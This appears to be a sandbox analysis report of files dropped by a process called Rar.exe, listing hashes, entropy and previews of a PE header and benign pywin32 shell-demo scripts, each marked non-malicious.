                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W..............=....A......A......A.........................A....................................Rich...................PE..L......d...........!......................................................................@.........................@.......4...........T...........................0q..T...........................`S..@.......................@....................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...T...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48622
                                                                                                                                                                                      Entropy (8bit):5.540142077557078
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:K1MBiUiNoCeRDokY3YATb6Db9CbYTYJ8IVMztBa6wb:GMBhiNFHn6Sb
                                                                                                                                                                                      MD5:1D421DD2742CBEF8E1CCEF15A725B59A
                                                                                                                                                                                      SHA1:87EEC2599AD35F80AB11A55F1C068944D3FE7BFB
                                                                                                                                                                                      SHA-256:22CF38BC9BBBB7402D5C9A769C75EDBCD93181503E74506AE340360EF50FD009
                                                                                                                                                                                      SHA-512:8131DDC13374BC6B4CB9B9BFA65A9A675BDAED5888A44C945856708138EBAE5D2A9C9C0DD2440A145AEEB37F47398E55CAF208367C8BF4DEB2ADFB26472EA7F7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# hand generated from propsys.h..## PROPENUMTYPE, used with IPropertyEnumType.PET_DISCRETEVALUE = 0.PET_RANGEDVALUE = 1.PET_DEFAULTVALUE = 2.PET_ENDRANGE = 3..PDTF_DEFAULT = 0.PDTF_MULTIPLEVALUES = 0x1.PDTF_ISINNATE = 0x2.PDTF_ISGROUP = 0x4.PDTF_CANGROUPBY = 0x8.PDTF_CANSTACKBY = 0x10.PDTF_ISTREEPROPERTY = 0x20.PDTF_INCLUDEINFULLTEXTQUERY = 0x40.PDTF_ISVIEWABLE = 0x80.PDTF_ISQUERYABLE = 0x100.PDTF_ISSYSTEMPROPERTY = 0x80000000.PDTF_MASK_ALL = 0x800001FF..PDVF_DEFAULT = 0.PDVF_CENTERALIGN = 0x1.PDVF_RIGHTALIGN = 0x2.PDVF_BEGINNEWGROUP = 0x4.PDVF_FILLAREA = 0x8.PDVF_SORTDESCENDING = 0x10.PDVF_SHOWONLYIFPRESENT = 0x20.PDVF_SHOWBYDEFAULT = 0x40.PDVF_SHOWINPRIMARYLIST = 0x80.PDVF_SHOWINSECONDARYLIST = 0x100.PDVF_HIDELABEL = 0x200.PDVF_HIDDEN = 0x800.PDVF_CANWRAP = 0x1000.PDVF_MASK_ALL = 0x1BFF..PDDT_STRING = 0.PDDT_NUMBER = 1.PDDT_BOOLEAN = 2.PDDT_DATETIME = 3.PDDT_ENUMERATED = 4..PDGR_DISCRETE = 0.PDGR_ALPHANUMERIC = 1.PDGR_SIZE = 2.PDGR_DYNAMIC = 3.PDGR_DATE = 4.PDGR_PERCENT = 5.PDGR_ENUM
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):206
                                                                                                                                                                                      Entropy (8bit):4.512680599938387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:1KvC8P5JsFKncCZk1MPMFMZ4B/EMAW+HQOzn:1Kq8P5J8KFZk1M1Z4BqnQOzn
                                                                                                                                                                                      MD5:3D5C530DF089F313087D12ED6DA42A3B
                                                                                                                                                                                      SHA1:01D3AC9D95F9E4331FF36079331CFB6F17CFD792
                                                                                                                                                                                      SHA-256:E431EA1C8FD25425C922230BCC5591F274519F77D3E29133864EC8139256FD5B
                                                                                                                                                                                      SHA-512:006FDC7754E0FCA9A367DEFD90BB5FB420B924DF4F6ECEC760CA0E5461DD1490A3F866F470FEE53F8C77DD7AA11FA9D2A6E2E835AA6075264E0A60D07AEB5DC3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from win32com.propsys import propsys, pscon..print("propsys was imported (sorry - that is the extent of the tests,").print("but see the shell folder_view demo, which uses this module)").# that's all folks!.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):135
                                                                                                                                                                                      Entropy (8bit):4.680015638860431
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SAFMBm3EAAGHQ+HWg7AIvGUVsLHKFaWlQkEr66NRS66u:SgCmCGHQqAaGUWLHKkWlQkAS6v
                                                                                                                                                                                      MD5:F45C606FFC55FD2F41F42012D917BCE9
                                                                                                                                                                                      SHA1:CA93419CC53FB4EFEF251483ABE766DA4B8E2DFD
                                                                                                                                                                                      SHA-256:F0BB50AF1CAEA5B284BD463E5938229E7D22CC610B2D767EE1778E92A85849B4
                                                                                                                                                                                      SHA-512:BA7BEBE62A6C2216E68E2D484C098662BA3D5217B39A3156B30E776D2BB3CF5D4F31DCDC48A2EB99BC5D80FFFE388B212EC707B7D10B48DF601430A07608FD46
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# See if we have a special directory for the binaries (for developers).import win32com..win32com.__PackageSupportBuildPath__(__path__).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2122
                                                                                                                                                                                      Entropy (8bit):4.964501903065558
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:fDjVVIN+cKqRT1/t/od+0v0LxIJVNjI7j1y4K4d3i7iAarHWfj:fDjVVU7F/UpVNM7Li7iAa4j
                                                                                                                                                                                      MD5:430D24F2ABC9FCAFF969FD5A149094B4
                                                                                                                                                                                      SHA1:04A9949F80250E04AE58B42EF8B2E3E1213261C4
                                                                                                                                                                                      SHA-256:8D9C4A29DBFCE83EBFD31DAAC23D346FD19271578D02B17B9520FE26E22BC471
                                                                                                                                                                                      SHA-512:A627C96ACDDD9E01865257CFEF20A124BB919B49FFAE27526821EDD22F76D29DCBB8B8ADAFCF6FF74D9B8E4B28B8EF27D24772895E69F83FDA7275CB469CA172
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import time..import pythoncom.from win32com.shell import shell, shellcon..website = "https://github.com/mhammond/pywin32/".iad = pythoncom.CoCreateInstance(. shell.CLSID_ActiveDesktop,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IActiveDesktop,.).opts = iad.GetDesktopItemOptions().if not (opts["ActiveDesktop"] and opts["EnableComponents"]):. print("Warning: Enabling Active Desktop"). opts["ActiveDesktop"] = True. opts["EnableComponents"] = True. iad.SetDesktopItemOptions(opts). iad.ApplyChanges(0xFFFF). iad = None. ## apparently takes a short while for it to become active. time.sleep(2). iad = pythoncom.CoCreateInstance(. shell.CLSID_ActiveDesktop,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IActiveDesktop,. )..cnt = iad.GetDesktopItemCount().print("Count:", cnt).for i in range(cnt):. print(iad.GetDesktopItem(i))..component = {. "ID": cnt + 1,. "ComponentType": shellcon.COMP_TYPE_WEBSITE,. "
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5153
                                                                                                                                                                                      Entropy (8bit):4.493888163704418
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:hVVpNvkw045fnZFjVrYgoh1ZRlCkAOnYBlrIjxlHd9HlehlkPd/iOnYBlrzlFBdB:hVV7ljnZFjqRY0jrZQhcqBICJDhyXpO
                                                                                                                                                                                      MD5:B8F2EA8D679EA86D5FFBFC13C2E7315C
                                                                                                                                                                                      SHA1:64B8F2FA27152D21EF833139CF22F15125C9A197
                                                                                                                                                                                      SHA-256:345A7D4623738C33EF0FB4FB153A16BA4FB4B8C7C33E4A828015BC8CD2445FB4
                                                                                                                                                                                      SHA-512:FC9C4708042CFDC079D27F088CCC29F3887C30574F89DB1EDFFAE602F9CE2B834BB33E47952D792727486D052E77B410EC9058FB4694384F99D7EA20EAC5436F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Sample implementation of IFileOperationProgressSink that just prints.# some basic info..import pythoncom.from win32com.server.policy import DesignatedWrapPolicy.from win32com.shell import shell, shellcon..tsf_flags = list(. (k, v) for k, v in list(shellcon.__dict__.items()) if k.startswith("TSF_").)...def decode_flags(flags):. if flags == 0:. return "TSF_NORMAL". flag_txt = "". for k, v in tsf_flags:. if flags & v:. if flag_txt:. flag_txt = flag_txt + "|" + k. else:. flag_txt = k. return flag_txt...class FileOperationProgressSink(DesignatedWrapPolicy):. _com_interfaces_ = [shell.IID_IFileOperationProgressSink]. _public_methods_ = [. "StartOperations",. "FinishOperations",. "PreRenameItem",. "PostRenameItem",. "PreMoveItem",. "PostMoveItem",. "PreCopyItem",. "PostCopyItem",. "PreDeleteItem",. "PostDeleteItem",. "PreNewItem"
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1917
                                                                                                                                                                                      Entropy (8bit):5.149600843639279
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZgNV0sIOM+JCH3PaHA6Fx1IEhlI7/7UDIQGR:ZgNV0szMCCHAMqI
                                                                                                                                                                                      MD5:E789F5DADE7F09955A2F0ADD9A4ED147
                                                                                                                                                                                      SHA1:CFAA354D98D8D97823E831720080E83B41C25D41
                                                                                                                                                                                      SHA-256:10485012A34EA3BDF42454F0BE557B03A0C957FD3A4B3855DC74FC9673C7C5D8
                                                                                                                                                                                      SHA-512:2A0415426F41C995E5CDDA7E097ADC20F831917C64D3E6F1F5E425AF6182BA37076E6D0766E203096AE695B7038A26B91BF9AD2A6A348D3D7CA1EA40924719B7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import sys..import pythoncom.import win32api.from win32com.shell import shell, shellcon..temp_dir = win32api.GetTempPath().linkname = win32api.GetTempFileName(temp_dir, "cmd")[0].os.remove(linkname).linkname += ".lnk".print("Link name:", linkname).ish = pythoncom.CoCreateInstance(. shell.CLSID_ShellLink, None, pythoncom.CLSCTX_INPROC_SERVER, shell.IID_IShellLink.).ish.SetPath(os.environ["cOMSPEC"]).ish.SetWorkingDirectory(os.path.split(sys.executable)[0]).ish.SetDescription("shortcut made by python")..console_props = {. "Signature": shellcon.NT_CONSOLE_PROPS_SIG,. "InsertMode": True,. "FullScreen": False, ## True looks like "DOS Mode" from win98!. "FontFamily": 54,. "CursorSize": 75, ## pct of character size. "ScreenBufferSize": (152, 256),. "AutoPosition": False,. "FontSize": (4, 5),. "FaceName": "",. "HistoryBufferSize": 32,. "InputBufferSize": 0,. "QuickEdit": True,. "Font": 0, ## 0 should always be present, use win32console.Get
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2870
                                                                                                                                                                                      Entropy (8bit):4.718263766235126
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:xxVVpNvgDzNwMkHFaVNIWjk14WPD/QBbqlnlQFloMlb1nbMG:3VV7gDCME0VLjAVPD/gxMM+G
                                                                                                                                                                                      MD5:43BEB126A494AC8C2DC7690F1ACA9FF8
                                                                                                                                                                                      SHA1:14F2B9A06E3ACB4DB380DFF93B9C1A42F128D238
                                                                                                                                                                                      SHA-256:BDF8750F39B827CAD3139D117A7FB331936D3D82BB4D569918A72AE081B17AFB
                                                                                                                                                                                      SHA-512:4B65BB067F25C504CF974CE055DF843E362267085C18811D523EAEC3FC42237F795C97469FC7FDC29CA4C367F11C093F21745B9674F173D513AC2F7C327BC77E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ITransferAdviseSink implementation template..import pythoncom.from win32com.server.policy import DesignatedWrapPolicy.from win32com.shell import shell, shellcon..tsf_flags = list(. (k, v) for k, v in list(shellcon.__dict__.items()) if k.startswith("TSF_").)...def decode_flags(flags):. if flags == 0:. return "TSF_NORMAL". flag_txt = "". for k, v in tsf_flags:. if flags & v:. if flag_txt:. flag_txt = flag_txt + "|" + k. else:. flag_txt = k. return flag_txt...TRANSFER_ADVISE_STATES = {}.for k, v in list(shellcon.__dict__.items()):. if k.startswith("TS_"):. TRANSFER_ADVISE_STATES[v] = k...def decode_flags(flags):. if flags == 0:. return "TSF_NORMAL". flag_txt = "". for k, v in tsf_flags:. if flags & v:. if flag_txt:. flag_txt = flag_txt + "|" + k. else:. flag_txt = k. return flag_txt...class TransferAdviseSink(DesignatedW
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1652
                                                                                                                                                                                      Entropy (8bit):4.966229174278164
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:wVYSOct+0NStW7IQ5YIQnrXaVs/Oc9LIQAdiWyvvsO7iWavvPQu:wVYSO4xNStWP52j2sGcZ/Jvs9lvPn
                                                                                                                                                                                      MD5:B62C30C437ABEF50FE0779C496B510E1
                                                                                                                                                                                      SHA1:16774174E1A2B133AA8F4D872CD38DF7D9A874B2
                                                                                                                                                                                      SHA-256:72C6B1A79FE131E4947A297867952B00373C8122897C499AE8C9CC32929D314C
                                                                                                                                                                                      SHA-512:7C06D5B8E4150EE73D6DB641C6D466F1F2DBC08EA38028B66AFF447C3C3D97DF079E9E4D53DED7404CAA1CFF2D035D2344139329C8E333A7728CEFB79E36AB4B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import pythoncom.import win32api.from win32com.shell import shell, shellcon...class InternetShortcut:. def __init__(self):. self._base = pythoncom.CoCreateInstance(. shell.CLSID_InternetShortcut,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IUniformResourceLocator,. ).. def load(self, filename):. # Get an IPersist interface. # which allows save/restore of object to/from files. self._base.QueryInterface(pythoncom.IID_IPersistFile).Load(filename).. def save(self, filename):. self._base.QueryInterface(pythoncom.IID_IPersistFile).Save(filename, 1).. def __getattr__(self, name):. if name != "_base":. return getattr(self._base, name)...temp_dir = win32api.GetTempPath().linkname = win32api.GetTempFileName(temp_dir, "ish")[0].print("Link:", linkname).os.remove(linkname).linkname += ".url"..ish = InternetShortcut().ish.SetURL("https://github.com/mhammond/pywin32")
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1502
                                                                                                                                                                                      Entropy (8bit):4.753864989752387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:l+IVwvYHfCpHQjcGFVCpEEwvpEJgzQMb4pjEGD+YAm9MsH0czgCRE/:RV0NpHQjPFHNYgZ4mRYAg0c8CK/
                                                                                                                                                                                      MD5:FC21F7F05AFE0DC055E2D44483DB95B5
                                                                                                                                                                                      SHA1:18ABBBCB5A6DF731A0743B79C28A7564B3B32275
                                                                                                                                                                                      SHA-256:45E1A6F22EFC25D4A64EDF4F0995ECF702EE47D39D81F267DDAF2DB83BC886AA
                                                                                                                                                                                      SHA-512:506C9997292E47408282B35B6299F6112C359429C8207218C1EE327BE7AC75F178D8C21A6D2B5D262FCDF28CCAC40B6646C9E882207F616B8B59E1071C160A32
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A couple of samples using SHBrowseForFolder..import os..import win32gui.from win32com.shell import shell, shellcon...# A callback procedure - called by SHBrowseForFolder.def BrowseCallbackProc(hwnd, msg, lp, data):. if msg == shellcon.BFFM_INITIALIZED:. win32gui.SendMessage(hwnd, shellcon.BFFM_SETSELECTION, 1, data). elif msg == shellcon.BFFM_SELCHANGED:. # Set the status text of the. # For this message, 'lp' is the address of the PIDL.. pidl = shell.AddressAsPIDL(lp). try:. path = shell.SHGetPathFromIDList(pidl). win32gui.SendMessage(hwnd, shellcon.BFFM_SETSTATUSTEXT, 0, path). except shell.error:. # No path for this PIDL. pass...if __name__ == "__main__":. # Demonstrate a dialog with the cwd selected as the default - this. # must be done via a callback function.. flags = shellcon.BIF_STATUSTEXT. shell.SHBrowseForFolder(. 0, # parent HWND. None, # root PIDL..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2336
                                                                                                                                                                                      Entropy (8bit):4.515110795958441
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:tmgW5gtjVxut+UNStW7IQ5YIQnMXavrYfruIi0tTkMI5S8LkKhB:2wjVxO3NStWP52o8r8tTkt
                                                                                                                                                                                      MD5:BFA30B4C6A14C8E48D8073FEC282CADB
                                                                                                                                                                                      SHA1:B352384CE0DFFC8386692D6F1D0C4DB11ACD7559
                                                                                                                                                                                      SHA-256:013CAA4F59D92FF001B6A7DADBF13C025B49E27800E3F07C81505550F162C71B
                                                                                                                                                                                      SHA-512:D097453E1A8DF523D6B8D3C448C8A52171CD8C44062B3BE22F43521F0F0028ADA32F2FFFD64FA03694ED3B08D9D692AC17F7A025FD3F43781C4A79148F94E5E2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# link.py.# From a demo by Mark Hammond, corrupted by Mike Fletcher.# (and re-corrupted by Mark Hammond :-).import os..import pythoncom.from win32com.shell import shell...class PyShortcut:. def __init__(self):. self._base = pythoncom.CoCreateInstance(. shell.CLSID_ShellLink,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IShellLink,. ).. def load(self, filename):. # Get an IPersist interface. # which allows save/restore of object to/from files. self._base.QueryInterface(pythoncom.IID_IPersistFile).Load(filename).. def save(self, filename):. self._base.QueryInterface(pythoncom.IID_IPersistFile).Save(filename, 0).. def __getattr__(self, name):. if name != "_base":. return getattr(self._base, name)...if __name__ == "__main__":. import sys.. if len(sys.argv) < 2:. print(. "Usage: %s LinkFile [path [, args[, description[, working_dir]]]]\n\nIf LinkF
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1688
                                                                                                                                                                                      Entropy (8bit):4.793028770522822
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:lMghjVigDZRSd+rIQt5lRhZf2L6l7swsIp:lMghjViERiiHlR3tswsIp
                                                                                                                                                                                      MD5:C9D27A3E3BD79CEFD461DFEDE9B7A4B3
                                                                                                                                                                                      SHA1:4E1CCC49E93BA04F4655FC0FA5C2A8C89B6D8E52
                                                                                                                                                                                      SHA-256:60AF94B8D6E812A38AAFBB620CD5BC59C7005128E7E6B5A5E4EB2652AB532EB8
                                                                                                                                                                                      SHA-512:47D3C1AF0DFC9846E242592E41729A6D95664157DED107852B57394286F6A0B3BFE21AFB696D2958545B3E0B32FA0F1D4D7783856B42FDB3CE97FF4E255D8919
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# dump_link.py - dumps information about shell shortcuts.#.import glob.import os.import sys..import pythoncom.from win32com.shell import shell, shellcon.from win32com.storagecon import *...def DumpLink(fname):. shellLink = pythoncom.CoCreateInstance(. shell.CLSID_ShellLink,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IShellLink,. ). persistFile = shellLink.QueryInterface(pythoncom.IID_IPersistFile). persistFile.Load(fname, STGM_READ). shellLink.Resolve(0, shell.SLR_ANY_MATCH | shell.SLR_NO_UI). fname, findData = shellLink.GetPath(0). print("Filename:", fname, ", UNC=", shellLink.GetPath(shell.SLGP_UNCPRIORITY)[0]). print("Description:", shellLink.GetDescription()). print("Working Directory:", shellLink.GetWorkingDirectory()). print("Icon:", shellLink.GetIconLocation())...def FavDumper(nothing, path, names):. # called by os.path.walk. for name in names:. print(name, end=" "). try:. DumpLink(n
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4956
                                                                                                                                                                                      Entropy (8bit):4.742030097814967
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:WCfgJV/BUxRB+DVbYy2X6JenZ02yiRcGJTQWaZNfmiGpcNIwi:WCfEBmkVb2RnLHvxaDeiHuwi
                                                                                                                                                                                      MD5:A67FC9C637F34AE4FD7BBC3BF56BF1AA
                                                                                                                                                                                      SHA1:EA814518E366440B782F568FF609DCE47CBDDF74
                                                                                                                                                                                      SHA-256:67D2B811101F7034AB03558B7502EA50D0D66AF60EE69924BD3FB46873107F31
                                                                                                                                                                                      SHA-512:76357461D0B5033DA1995BA7A35DBE26EA10105668DFBC0F4226182CCCD419F3E5EF278DE88F2F19F52953871C0077E4CC213BAE1C3FCB65F044A3078AD64A5D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample of using Vista's IExplorerBrowser interfaces....# Currently doesn't quite work:.# * CPU sits at 100% while running...import sys..import pythoncom.import win32api.import win32con.import win32gui.from win32com.server.util import unwrap, wrap.from win32com.shell import shell, shellcon..# event handler for the browser..IExplorerBrowserEvents_Methods = """OnNavigationComplete OnNavigationFailed . OnNavigationPending OnViewCreated""".split()...class EventHandler:. _com_interfaces_ = [shell.IID_IExplorerBrowserEvents]. _public_methods_ = IExplorerBrowserEvents_Methods.. def OnNavigationComplete(self, pidl):. print("OnNavComplete", pidl).. def OnNavigationFailed(self, pidl):. print("OnNavigationFailed", pidl).. def OnNavigationPending(self, pidl):. print("OnNavigationPending", pidl).. def OnViewCreated(self, view):. print("OnViewCreated", view). # And if our demo view has been registered, it may
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3743
                                                                                                                                                                                      Entropy (8bit):4.695336004293959
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ufgZDltoV4544MKfOV7ORD16EnUBCrtb5zQy+kS36LhyFtDQ/MBXwgGR:AgHnkaQ7ORD16EUejQ3kS36LhyFtDQ//
                                                                                                                                                                                      MD5:6C4997A0590505D6B9D4E11BE2B0428E
                                                                                                                                                                                      SHA1:822B2683FB86331F198B5F917F04CDC68757855D
                                                                                                                                                                                      SHA-256:7BCDA7BCC2B8D503E260DAD199E8202CA143E214C22F70B31AEE1A7ECA3E8C66
                                                                                                                                                                                      SHA-512:1CBC4EA469C883776B5A6EC9DFCC9919E617695F1F7D0984ECA89D631DB46075EA2BBF50F3D69B9704381839A778D78FBDBF691908B51A48751673D19DFEF43B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample shell column provider.# Mainly ported from MSDN article:.# Using Shell Column Handlers for Detailed File Information,.# Raymond Chen, Microsoft Corporation, February 2000.#.# To demostrate:.# * Execute this script to register the namespace..# * Open Windows Explorer.# * Right-click an explorer column header - select "More".# * Locate column 'pyc size' or 'pyo size', and add it to the view..# This handler is providing that column data..import os.import stat..import commctrl.import pythoncom.from pywintypes import IID.from win32com.server.util import wrap.from win32com.shell import shell, shellcon..IPersist_Methods = ["GetClassID"].IColumnProvider_Methods = IPersist_Methods + [. "Initialize",. "GetColumnInfo",. "GetItemData",.]...class ColumnProvider:. _reg_progid_ = "Python.ShellExtension.ColumnProvider". _reg_desc_ = "Python Sample Shell Extension (Column Provider)". _reg_clsid_ = IID("{0F14101A-E05E-4070-BD54-83DFA58C3D68}"). _com_interfaces_ = [.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4413
                                                                                                                                                                                      Entropy (8bit):4.8718027906296015
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:xJ3W+0YJbVeNDJP8hppPFFKEaMpz0EuzlC4KltWimIFGZPDQ/uXwgGR:xNW+7IV8/pOE7pzPuza6i14PDQ/uXDGR
                                                                                                                                                                                      MD5:962A1AFF29A3354202644492184916B0
                                                                                                                                                                                      SHA1:ACA9DA847DA3807B3014235F5EA2194EBB0E3882
                                                                                                                                                                                      SHA-256:95AB64B6F7FE56B6FEBC1390E0436DF2373FE302727D167D281065D806A3D01C
                                                                                                                                                                                      SHA-512:062FA321E95B29807D347EE23E77259032F45C3384D06DB2874DFF6C9D1D57D61C198841F5180070840D095538927FE20CB1BB1163520C68804E12C59CB823F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample context menu handler..# Adds a 'Hello from Python' menu entry to .py files. When clicked, a.# simple message box is displayed..#.# To demostrate:.# * Execute this script to register the context menu..# * Open Windows Explorer, and browse to a directory with a .py file..# * Right-Click on a .py file - locate and click on 'Hello from Python' on.# the context menu...import pythoncom.import win32con.import win32gui.from win32com.shell import shell, shellcon...class ShellExtension:. _reg_progid_ = "Python.ShellExtension.ContextMenu". _reg_desc_ = "Python Sample Shell Extension (context menu)". _reg_clsid_ = "{CED0336C-C9EE-4a7f-8D7F-C660393C381F}". _com_interfaces_ = [shell.IID_IShellExtInit, shell.IID_IContextMenu]. _public_methods_ = shellcon.IContextMenu_Methods + shellcon.IShellExtInit_Methods.. def Initialize(self, folder, dataobj, hkey):. print("Init", folder, dataobj, hkey). self.dataobj = dataobj.. def QueryContextMenu(self, hMenu, in
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2691
                                                                                                                                                                                      Entropy (8bit):4.918411583843704
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:23w21V7W2LcbHOfPZsMdaKEVsc2c6/8AKM8AKt6+LPDvI/uXwXwGE:CZVCT6Js0EVsc2ctNLPDQ/uXwgGE
                                                                                                                                                                                      MD5:B0A82BD7CB7AA7A81C22B39572AD0869
                                                                                                                                                                                      SHA1:CC2828A142C1AAA9B0F890F2F5F37012DF286211
                                                                                                                                                                                      SHA-256:9A5170C42EE29B2FFBD39D529E2E1CFA22E7A5DCF4A238AB454542F905E6F2BE
                                                                                                                                                                                      SHA-512:54D423A51AB78C8547C9C022A0DE941C9278F3BF8395AFCAD81E2461E1B6191D9C42157203A139D71C1206E5B5EA664C1D61E0082293082D54D2F0B4782A48EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
